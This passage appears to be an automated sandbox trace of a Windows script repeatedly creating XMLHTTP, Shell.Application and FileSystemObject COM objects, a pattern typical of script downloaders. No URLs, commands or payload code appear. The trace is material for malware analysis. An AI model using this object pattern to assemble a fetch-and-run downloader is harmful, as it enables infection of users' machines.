	[0314.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0314.232] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0314.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0314.233] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0314.233] SysStringLen (param_1=0x0) returned 0x0
	[0314.233] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0314.233] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0314.233] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef970) returned 0x0
	[0314.233] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0314.233] Shell:IUnknown:QueryInterface (in: This=0x64ef970, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef9b0) returned 0x0
	[0314.233] ??2@YAPEAX_K@Z () returned 0x62f350
	[0314.233] Shell:IObjectWithSite:SetSite (This=0x64ef9b0, pUnkSite=0x62f350) returned 0x0
	[0314.233] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0314.233] Shell:IUnknown:Release (This=0x64ef9b0) returned 0x1
	[0314.233] Shell:IUnknown:QueryInterface (in: This=0x64ef970, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef970) returned 0x0
	[0314.234] Shell:IUnknown:AddRef (This=0x64ef970) returned 0x3
	[0314.234] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0314.234] SysStringLen (param_1=0x0) returned 0x0
	[0314.234] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0314.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0314.237] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0314.237] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0314.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0314.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0314.237] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0315.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0315.398] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0315.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0315.402] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.402] SysStringLen (param_1=0x0) returned 0x0
	[0315.402] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.402] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0315.402] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0315.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0315.402] ??2@YAPEAX_K@Z () returned 0x62f330
	[0315.402] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0315.402] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.402] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0315.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0315.402] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0315.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.402] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.405] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.405] SysStringLen (param_1=0x0) returned 0x0
	[0315.405] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.405] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0315.405] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0315.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0315.405] ??2@YAPEAX_K@Z () returned 0x62f310
	[0315.405] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0315.405] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.406] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0315.406] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.406] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.406] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.406] SysStringLen (param_1=0x0) returned 0x0
	[0315.406] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.406] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0315.406] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0315.406] ??2@YAPEAX_K@Z () returned 0x62f330
	[0315.406] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0315.406] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.407] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.407] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.407] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.407] SysStringLen (param_1=0x0) returned 0x0
	[0315.407] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.407] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0315.407] ??2@YAPEAX_K@Z () returned 0x62f310
	[0315.407] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.407] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0315.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0315.408] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.408] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.408] longjmp () 
	[0315.408] longjmp () 
	[0315.408] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.408] SysStringLen (param_1=0x0) returned 0x0
	[0315.408] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.408] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0315.408] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
